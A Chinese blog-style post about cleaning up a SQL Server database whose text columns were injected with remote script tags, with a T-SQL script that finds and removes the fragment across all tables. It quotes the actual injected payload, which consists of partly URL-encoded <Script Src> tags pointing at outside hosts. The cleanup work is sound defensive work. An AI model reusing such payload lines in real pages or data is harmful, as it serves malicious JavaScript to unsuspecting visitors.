最近公司总是 被攻击,数据库中的很多表被注入了js 脚本,比如
"<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script><Script Src=http://c.%6Euclear3.com/css/c.js></Script><script src=http://cn.daxia123.cn/cn.js>",等等类似
于是写了一个替换语句来替换掉那些脚本,主要就是把脚本替换为空格。使用这条语句时,只要在下面这个地方把你要查找并替换的关键字换掉就可以了:
--要替换的文字
set @mySqlForReplaceSrc='<Script Src='
如果你不想替换为空格,那么在 +@quto+@quto+ 之间加入你要替换的文本就可以了。
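-- Release a global cursor left behind by an earlier run that aborted before
-- reaching its own DEALLOCATE. CURSOR_STATUS returns -3 when no cursor of that
-- name exists, so this batch no longer errors out in a fresh session.
If Cursor_Status('global', 'Table_Cursor') <> -3
    Deallocate Table_Cursor
go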
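-- Scan every character column of every user table for an injected fragment.
-- Dry run (the default, matching the original where the UPDATE statements were
-- commented out): print the table.column and list the matching values.
-- With @dryRun = 0 the fragment is replaced in place.
Declare @mySqlForReplaceSrc nvarchar(500), @mySqlForReplaceWith nvarchar(500), @dryRun bit
-- The text to find (the original hard-coded this inside the loop).
-- LIKE wildcards (%, _, [) inside it are not escaped; escape them yourself if
-- the fragment contains any. Matching is collation-dependent.
Set @mySqlForReplaceSrc = '<Script Src='
-- Replacement text; '' removes the fragment (the original's +@quto+@quto+ slot).
Set @mySqlForReplaceWith = ''
-- 1 = report only; 0 = apply the UPDATE.
Set @dryRun = 1

Declare @T sysname, @C sysname, @colType int, @cnt int, @num int
Declare @qTable nvarchar(258), @qColumn nvarchar(258), @colExpr nvarchar(300)
Declare @mySqlForWhere nvarchar(500), @mySqlForCount nvarchar(3000),
        @mySqlForSelect nvarchar(3000), @mySqlForReplace nvarchar(3000)
Declare @pattern nvarchar(502), @paramDef nvarchar(500), @countParamDef nvarchar(500)

Set @cnt = 0
-- The fragment and its replacement are bound as sp_executesql parameters, so a
-- quote inside them cannot break out of the generated statement (the original
-- spliced them into string literals). Only identifiers are spliced in, and
-- those go through QUOTENAME.
Set @pattern = '%' + @mySqlForReplaceSrc + '%'
Set @paramDef = N'@pattern nvarchar(502), @needle nvarchar(500), @with nvarchar(500)'
Set @countParamDef = @paramDef + N', @a int output'

-- LOCAL: the cursor is released automatically when the batch ends, even if the
-- batch aborts mid-loop (the original global cursor leaked, which is why a
-- separate DEALLOCATE batch was needed before re-running).
Declare Table_Cursor Cursor Local Fast_Forward For
Select A.Name, B.Name, B.Xtype
From Sysobjects A
Inner Join Syscolumns B On B.Id = A.Id
Where A.Xtype = 'u'
  -- ntext, text, nvarchar, varchar, plus nchar and char which the original skipped
  And B.Xtype In (99, 35, 231, 167, 239, 175)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T, @C, @colType
While @@Fetch_Status = 0
Begin
    -- QUOTENAME handles names containing ] or other delimiters; the original
    -- left the table name unbracketed in the UPDATE.
    -- NOTE(review): tables are not schema-qualified (the original wasn't either),
    -- so tables outside the caller's default schema will not resolve.
    Set @qTable = QuoteName(@T)
    Set @qColumn = QuoteName(@C)
    -- REPLACE does not accept text/ntext; cast to nvarchar(max) (SQL 2005+)
    -- instead of the original varchar(8000), which truncated long values and
    -- lost non-ASCII text on ntext/nvarchar columns.
    If @colType In (35, 99)
        Set @colExpr = 'Cast(' + @qColumn + ' as nvarchar(max))'
    Else
        Set @colExpr = @qColumn
    Set @mySqlForWhere = ' where ' + @qColumn + ' like @pattern'
    -- EXISTS stops at the first hit; the original counted every matching row.
    Set @mySqlForCount = 'select @a = case when exists (select * from ' + @qTable + @mySqlForWhere + ') then 1 else 0 end'
    Set @mySqlForSelect = 'select ' + @qColumn + ' from ' + @qTable + @mySqlForWhere
    Set @mySqlForReplace = 'update ' + @qTable + ' set ' + @qColumn + ' = replace(' + @colExpr + ', @needle, @with)' + @mySqlForWhere
    Exec sp_executesql @mySqlForCount, @countParamDef,
        @pattern = @pattern, @needle = @mySqlForReplaceSrc, @with = @mySqlForReplaceWith, @a = @num Output
    If @num > 0
    Begin
        -- Say which column the following result set belongs to.
        Print @T + '.' + @C
        Exec sp_executesql @mySqlForSelect, @paramDef,
            @pattern = @pattern, @needle = @mySqlForReplaceSrc, @with = @mySqlForReplaceWith
        If @dryRun = 0
            Exec sp_executesql @mySqlForReplace, @paramDef,
                @pattern = @pattern, @needle = @mySqlForReplaceSrc, @with = @mySqlForReplaceWith
    End
    Set @cnt = @cnt + 1
    Fetch Next From Table_Cursor Into @T, @C, @colType
End
Close Table_Cursor
-- Number of columns scanned, not the number of hits.
Print @cnt
Deallocate Table_Cursor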